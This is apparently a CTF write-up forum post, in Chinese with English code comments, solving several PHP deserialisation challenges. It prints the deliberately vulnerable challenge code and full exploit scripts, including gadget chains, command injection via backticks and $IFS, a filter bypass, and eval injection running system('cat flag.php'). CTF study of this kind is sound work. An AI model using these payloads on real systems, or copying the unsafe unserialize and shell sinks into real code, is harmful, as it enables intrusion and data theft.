@shaobaobaoer
2020-12-09T06:39:55.000000Z
发现了一个站 http://106.14.114.127/ ，准备做做里面的题目。
<?php
// 1 === E_ERROR: only fatal errors are reported, so the notices the chain below
// produces (e.g. the never-assigned $sth in cool::read()) never reach the
// response. The leading @ adds nothing on error_reporting() itself.
@error_reporting(1);
// flag.php is not shown on this page; the exploit reads it back from disk
// through cool::read() by setting $filename = "flag.php".
include 'flag.php';
// Entry point of the gadget chain. unserialize($_GET['data']) rebuilds this
// object WITHOUT running __construct(), so $skyobj holds whatever the attacker
// serialised into the protected "\0*\0skyobj" slot (a cool instance in the
// exploit below) instead of sec; the `echo $Input_data` at the bottom of the
// file then fires __toString().
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new sec;
}
// Delegates to ->read() on whatever object $skyobj holds. Returns nothing
// (null) when $skyobj is unset, which PHP 7+ rejects for __toString().
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}
// Gadget reached from baby::__toString(). Three properties of this code are
// what the exploit relies on:
//  * $amzing is unserialize()d again -> a second attacker-controlled object.
//  * $sth is never assigned, so $nice->aaa is set to null; the strict `===`
//    check still passes when the payload serialised $bbb as a PHP reference
//    (R:) to $aaa, because both then read null.
//  * $filename is concatenated into the path with no validation (no ".."
//    filtering), so any file readable relative to the script's working
//    directory can be fetched - flag.php in this writeup.
class cool
{
public $filename;
public $nice;
public $amzing;
function read()
{
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
// The file is read twice; the first call only tests truthiness, so a file
// whose whole content is "" or "0" yields "you must be joking!".
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}
/**
 * Benign default target for baby::$skyobj: read() just returns a fixed banner.
 */
class sec
{
    /** @return string */
    function read()
    {
        $banner = "it's so sec~~";
        return $banner;
    }
}
// Sink: the raw `data` query parameter goes straight into unserialize() (PHP
// object injection) and the result is echoed, which invokes __toString() on the
// attacker's object. NOTE(review): this is the challenge's intended bug and is
// deliberately left in place.
if (!isset($_GET['data'])) {
    highlight_file("./index.php");
} else {
    $Input_data = unserialize($_GET['data']);
    echo $Input_data;
}
?>
思路写在EXP里了。
/**
 * Local stand-in for the server's cool class. Only the serialised property
 * layout matters, so read() is omitted; $filename is preset to the file that
 * cool::read() will open as "./flag.php".
 */
class cool
{
    public $filename;
    public $nice;
    public $amzing;

    function __construct()
    {
        $target = "flag.php";
        $this->filename = $target;
    }
}
/**
 * Local stand-in for the server's baby class. It has no constructor, so
 * $skyobj is not pre-filled with sec; set_skyobj() exists only because the
 * property is protected and must still be populated from the script below.
 */
class baby
{
    protected $skyobj;
    public $aaa;
    public $bbb;

    /** @param mixed $obj value placed into the protected "\0*\0skyobj" slot */
    function set_skyobj($obj)
    {
        $this->skyobj = $obj;
    }
}
# --- inner payload: the object cool::read() will unserialize() from $amzing ---
# Binding $bbb to $aaa by reference serialises $bbb as "R:" pointing at $aaa.
# After the server overwrites $aaa with the undefined (null) $sth, $bbb follows
# it, so `$aaa === $bbb` holds.
$inner = new baby();
$inner->bbb = &$inner->aaa;
$inner_serialized = serialize($inner);

# --- outer payload: baby -> (protected $skyobj) cool -> read() ---
$reader = new cool();
$reader->amzing = $inner_serialized;
$outer = new baby();
$outer->set_skyobj($reader);

# Dump for inspection, then print raw and URL-encoded forms. The protected
# property name contains NUL bytes, so the GET parameter must be encoded.
var_dump($outer);
echo serialize($outer) . PHP_EOL;
echo urlencode(serialize($outer));
<?php
// All error output is silenced, so a malformed payload fails without feedback.
error_reporting(0);
// Deserialisation gadget: __wakeup() filters $args, __destruct() then calls
// $this->method on them. Both properties are private, so they can only be
// populated through the serialised "\0come\0method" / "\0come\0args" slots.
class come{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
// Runs right after unserialize(): every argument is trimmed and passed through
// waf(). Only the values are filtered; the method name is not.
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
// Blacklist, not a sanitiser: drops < > * ; | ? newline and space, then removes
// every literal "flag" in a single pass (no re-scan, so "flaflagg" collapses to
// "flag"). Backticks and "$" survive, which is what the exploit uses ($IFS as
// the word separator).
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
// Command injection: $host is interpolated unescaped into a shell command line.
function echo($host){
system("echo $host");
}
// Runs when the object is freed (end of request). The whitelist allows only
// "echo", so this dispatches to echo() above with the filtered arguments.
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
// Variable-variable assignment for exactly ONE query parameter: the loop
// breaks after the first iteration, so `first=doller` has to be the first key
// in the query string.
foreach($_GET as $key => $value) {
if($i===1)
{
$i++;
$$key = $value;
}
else{break;}
}
if($first==="doller")
{
// Single-argument parse_str() writes the parsed pairs into the local scope
// (register_globals style; that form was removed in PHP 8.0). This is how
// $var/$bbb/$ccc get overwritten: a=var%3Dgive%26bbb%3Dme%26ccc%3Dflag
@parse_str($_GET['a']);
if($var==="give")
{
if($bbb==="me")
{
if($ccc==="flag")
{
echo "<br>welcome!<br>";
// Sink: attacker-controlled POST body into unserialize(); the come gadget
// above does the rest in __wakeup() / __destruct().
$come=@$_POST['come'];
unserialize($come);
}
}
else
{echo "<br>think about it<br>";}
}
else
{
echo "NO";
}
}
else
{
echo "Can you hack me?<br>";
highlight_file(__FILE__);
}
?>
exp
<?php
/**
 * Local copy of the server's come class holding only the two private
 * properties (serialised as "\0come\0method" and "\0come\0args"); the gadget
 * methods are not needed to build the payload.
 */
class come
{
    private $method;
    private $args;

    /**
     * @param string $method method name the server dispatches to ("echo")
     * @param array  $args   arguments that pass through waf() before the call
     */
    function __construct($method, $args)
    {
        $this->args = $args;
        $this->method = $method;
    }
}
// Payload 1: list the filesystem root. Backticks run the inner command, and
// because waf() strips literal spaces, $IFS stands in for the separator.
$payload = new come("echo", ['`ls$IFS/`']);
echo urlencode(serialize($payload)) . PHP_EOL;

// Value for the `a` query parameter, consumed by parse_str() on the server.
echo urlencode('var=give&bbb=me&ccc=flag');
之后把 payload 改为
$a = new come("echo", array("`cat\$IFS/flaflagg`"));
即可获得 flag。写成 `flaflagg` 是因为 waf 的 `str_replace('flag','',$str)` 只做一遍替换：中间的 `flag` 被删掉后，剩下的字符正好重新拼成 `flag`。
<?php
// flag.php is not shown on this page; the exploit reaches it through eval()
// in P::__invoke() (system('cat flag.php')).
include 'flag.php';
error_reporting(0);
highlight_file(__FILE__);
// Final gadget: eval() of a private property. $var can only be populated via
// the serialised "\0P\0var" slot, and __invoke() fires when a P instance is
// called like a function - K::__toString() below does exactly that.
class P {
private $var;
function __invoke(){
// Generated code is `global <var>;$ret = <var>;`. $var is spliced in twice
// without any quoting, so a value such as "\$GLOBALS;\$ret=system('ls')"
// turns the global statement into arbitrary PHP (see the writeup below).
eval(
'global '.$this -> var.';'.
'$ret = '.$this -> var.';'
);
return $ret;
}
}
/**
 * Middle gadget: converting a K to string calls whatever the protected $fn
 * holds as a function. With a P instance there, that is P::__invoke().
 * $fn cannot be set from outside the class, only via the serialised
 * "\0*\0fn" slot (or a subclass).
 */
class K {
    protected $fn;
    public $name;

    function __toString(){
        // Parenthesised so the callable is taken from the property, not a method.
        return ($this->fn)();
    }
}
/**
 * Guard gadget: after unserialize(), __wakeup() disarms $obj->fn unless the
 * contained object's public $name is "iv4n" (loose comparison). Setting that
 * name in the payload is all the bypass needs.
 */
class U {
    public $obj;

    function __wakeup(){
        $trusted = isset($this->obj->name) && $this->obj->name == "iv4n";
        if (!$trusted) {
            // NOTE(review): when $obj is a K, $fn is protected, so this write
            // from outside K appears to raise an Error rather than silently
            // neutralising the chain - it only matters on the failing path.
            $this->obj->fn = function(){};
        }
    }
}
// Sink: the POST body goes straight into unserialize() (which runs U::__wakeup()),
// then ->obj is echoed, triggering K::__toString() -> P::__invoke() -> eval().
echo unserialize($_POST['obj'])->obj;
分析：U::__wakeup() 只在 `$obj->name != "iv4n"` 时才把 fn 置空，所以让 class K 中的 $name 等于 iv4n 即可绕过 __wakeup() 的检查。K::__toString() 会把 $fn 当作函数调用，可见 fn 应该是 class P 的实例，从而调用到它的 __invoke 方法：eval('global ' . $var . ';' . '$ret = ' . $var . ';');
写得很 trick：$var 被原样拼进 eval 两次，利用这样的 payload 可以绕过 global 语句的限制 ==> $var = "\$GLOBALS;\$ret=system('dir')";
EXP如下
<?php
//include 'flag.php';
//error_reporting(0);
//highlight_file(__FILE__);
/**
 * Local copy of P. The server's P has no setter and $var is private, so a
 * __set() hook is added here purely so the script can assign it; the
 * serialised form ("\0P\0var") is unaffected because methods are never
 * serialised.
 */
class P
{
    private $var;

    function __set($property_name, $value)
    {
        // Inside the class the private property is reachable directly.
        $this->{$property_name} = $value;
    }
}
/**
 * Local copy of K. $fn is protected, so __set() lets the script hand it the P
 * instance; $name is public and preset through the constructor ("iv4n" is the
 * value U::__wakeup() checks for on the server).
 */
class K
{
    protected $fn;
    public $name;

    /** @param string $name value for the public $name property */
    function __construct($name)
    {
        $this->name = $name;
    }

    function __set($property_name, $value)
    {
        $this->{$property_name} = $value;
    }
}
/** Local copy of U; only the public $obj slot is needed for the payload. */
class U
{
    public $obj;
}
// K carrying the name that satisfies U::__wakeup()'s check.
$k = new K("iv4n");

// P whose private $var becomes the text eval()'d by P::__invoke(). The leading
// "\$GLOBALS;" is what the writeup uses to get past the generated
// `global ...;` statement; the rest runs the command. An earlier run with
// system('ls') listed: Dockerfile flag.php index.php run.sh run.sh
$p = new P();
$p->var = "\$GLOBALS;\$ret=system('cat flag.php')";

// Wire the chain: U->obj = K, K->fn = P.
$k->fn = $p;
$u = new U();
$u->obj = $k;

var_dump($u);
echo urlencode(serialize($u));
# <?php
//$flag = "flag{0k_y0u_4lr3ady_kn0w_uns3ria1ize}";
<?php
require_once "flag.php";
/**
 * Holder for the flag/token. login() is not reached by the chain used on this
 * page (TOPC -> TOPB -> unserialize); it returns the token only for a fixed
 * username/password pair, compared loosely with ==.
 */
class TOPA{
    public $token;
    public $ticket;
    public $username;
    public $password;

    /** @return string|null "key is:{token}" on a match, nothing otherwise */
    function login(){
        $credentials_ok = $this->username == 'aaaaaaaaaaaaaaaaa'
            && $this->password == 'bbbbbbbbbbbbbbbbbb';
        if (!$credentials_ok) {
            return null;
        }
        return 'key is:{'.$this->token.'}';
    }
}
// Second-stage gadget. __toString() runs when a TOPB is echoed (TOPC::__destruct
// below) and performs a NESTED unserialize() of $attr - so $attr has to carry a
// serialised string, not an object. The flag is then copied into ->token and
// compared strictly with ->ticket: a TOPA payload whose ticket is a PHP
// reference (R:) to token makes both read the flag, and var_dump() prints it.
class TOPB{
public $obj;
public $attr;
function __construct(){
$this->attr = null;
$this->obj = null;
}
function __toString(){
$this->obj = unserialize($this->attr);
$this->obj->token = $GLOBALS["flag"];
if($this->obj->token === $this->obj->ticket){
var_dump($this->obj);
return 'you get flag!';
}
}
}
/**
 * Chain entry: unserialize() creates the TOPC and, when it is released at the
 * end of the request, __destruct() prints $attr. With a TOPB stored there the
 * string conversion invokes TOPB::__toString().
 */
class TOPC{
    public $obj;
    public $attr;

    function __destruct(){
        print $this->attr;
    }
}
// Sink: the raw `a` query parameter is unserialize()d and the result discarded;
// all the work happens in __destruct()/__toString() of the rebuilt objects.
if (!isset($_GET['a'])) {
    highlight_file(__FILE__);
} else {
    unserialize($_GET['a']);
}
套路和之前一样：TOPC::__destruct() 里的 echo 触发 TOPB::__toString()，其中再 unserialize($attr) 得到 TOPA，用引用让 ticket 跟着 token 一起变成 flag，从而通过 === 检查。注意 $attr 里放的必须是序列化后的字符串，unserialize() 不接受对象。
<?php
/**
 * Local copy of TOPA. The constructor binds $ticket to $token by reference, so
 * serialize() emits ticket as "R:2;" (a reference to the token slot) and the
 * server's `$this->obj->token = $flag` makes `token === ticket` true.
 * username/password are filled in, but the chain on this page never calls login().
 */
class TOPA
{
    public $token;
    public $ticket;
    public $username;
    public $password;

    function __construct()
    {
        $this->username = 'aaaaaaaaaaaaaaaaa';
        $this->password = 'bbbbbbbbbbbbbbbbbb';
        // Seed value is irrelevant; the server overwrites token with the flag.
        $this->token = 123;
        $this->ticket = &$this->token;
    }
}
/**
 * Local copy of TOPB, keeping the server-side __toString() for reference.
 * Only the two public properties matter for the payload: $attr must hold the
 * serialised TOPA string that __toString() unserialize()s on the server.
 */
class TOPB
{
    public $obj;
    public $attr;

    function __construct()
    {
        $this->obj = null;
        $this->attr = null;
    }

    function __toString()
    {
        // Mirror of the server logic: rebuild TOPA from $attr, overwrite its
        // token with the global flag, and dump it when ticket (a reference to
        // token) compares equal.
        $this->obj = unserialize($this->attr);
        $this->obj->token = $GLOBALS["flag"];
        if ($this->obj->token === $this->obj->ticket) {
            var_dump($this->obj);
            return 'you get flag!';
        }
    }
}
/**
 * Local copy of TOPC: the outermost object of the payload. On the server its
 * __destruct() prints $attr, which for a TOPB means TOPB::__toString().
 */
class TOPC
{
    public $obj;
    public $attr;

    function __destruct()
    {
        print $this->attr;
    }
}
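// Build the chain outside-in: TOPC -> TOPB -> TOPA.
$A = new TOPA();   // ticket is a reference to token (see the class above)
$B = new TOPB();
// FIX: TOPB::__toString() on the server calls unserialize($this->attr), which
// takes a string. Nesting the TOPA *object* here would hand an object to
// unserialize() and the chain would stop before the comparison; store the
// serialised form instead. The inner "R:" reference is self-contained, so it
// survives being embedded as a string.
$B->attr = serialize($A);
$C = new TOPC();
$C->attr = $B;     // printed by __destruct() -> TOPB::__toString()

echo urlencode(serialize($C));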
（直接访问时页面先回显 `index.php解析开始`，这是 Show::__construct() 里 `echo $this->source.'解析开始'` 的输出，随后是源码。）
<?php
// 1 === E_ERROR: warnings (e.g. file_get_contents() on a missing path) are hidden.
error_reporting(1);
/**
 * Final gadget: a callable object. __invoke() base64-encodes and echoes the
 * file named by the private $var, which can only be populated through the
 * serialised "\0Read\0var" slot - none of Show's path regexes apply to it.
 */
class Read {
    private $var;

    /**
     * @param string $value path handed to file_get_contents()
     * @return string base64 of the file contents
     */
    public function file_get($value)
    {
        return base64_encode(file_get_contents($value));
    }

    public function __invoke(){
        echo $this->file_get($this->var);
    }
}
// Start of the gadget chain and the only place with any input filtering.
// unserialize() skips __construct() but runs __wakeup(), whose preg_match()
// forces $source to string. If $source holds another Show, that conversion
// calls its __toString(), which dereferences $str['str']->source: with a Test
// object there, the missing property triggers Test::__get() -> the callable in
// ->params -> Read::__invoke(). The file path lives in Read::$var and never
// passes through the regexes below.
class Show
{
public $source;
public $str;
// Not run by unserialize(); the "解析开始" banner shown above the listing comes
// from here when index.php is loaded normally.
public function __construct($file='index.php')
{
$this->source = $file;
echo $this->source.'解析开始'."<br>";
}
// Evaluates the property access for its side effect only and returns nothing;
// by the time PHP complains about the missing string result, Read::__invoke()
// has already echoed the file.
public function __toString()
{
$this->str['str']->source;
}
public function __set($key,$value)
{
$this->$key = $value;
}
// Normal-path viewer: blacklists scheme prefixes, ".." and one extra literal
// (plausibly a hint at the flag's filename - not confirmed on this page).
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|fllllllaaaaaag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
// Runs after unserialize(). Applying the regex to $source converts it to a
// string, i.e. calls __toString() on any object stored there.
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
/**
 * Magic-getter gadget: reading ANY undefined property on a Test ignores the
 * name and calls whatever $params holds. unserialize() skips __construct(),
 * so $params is attacker-chosen (a Read instance in the chain).
 */
class Test
{
    public $params;

    public function __construct()
    {
        $this->params = [];
    }

    /**
     * @param string $key requested property name (unused)
     * @return mixed whatever calling $params returns
     */
    public function __get($key)
    {
        return ($this->params)();
    }
}
// Sink: `chal` is unserialize()d and the result dropped - everything happens in
// Show::__wakeup() during unserialize(). Without the parameter the page just
// displays its own source.
if (!isset($_GET['chal'])) {
    $show = new Show('index.php');
    $show->_show();
} else {
    $chal = unserialize($_GET['chal']);
}
?>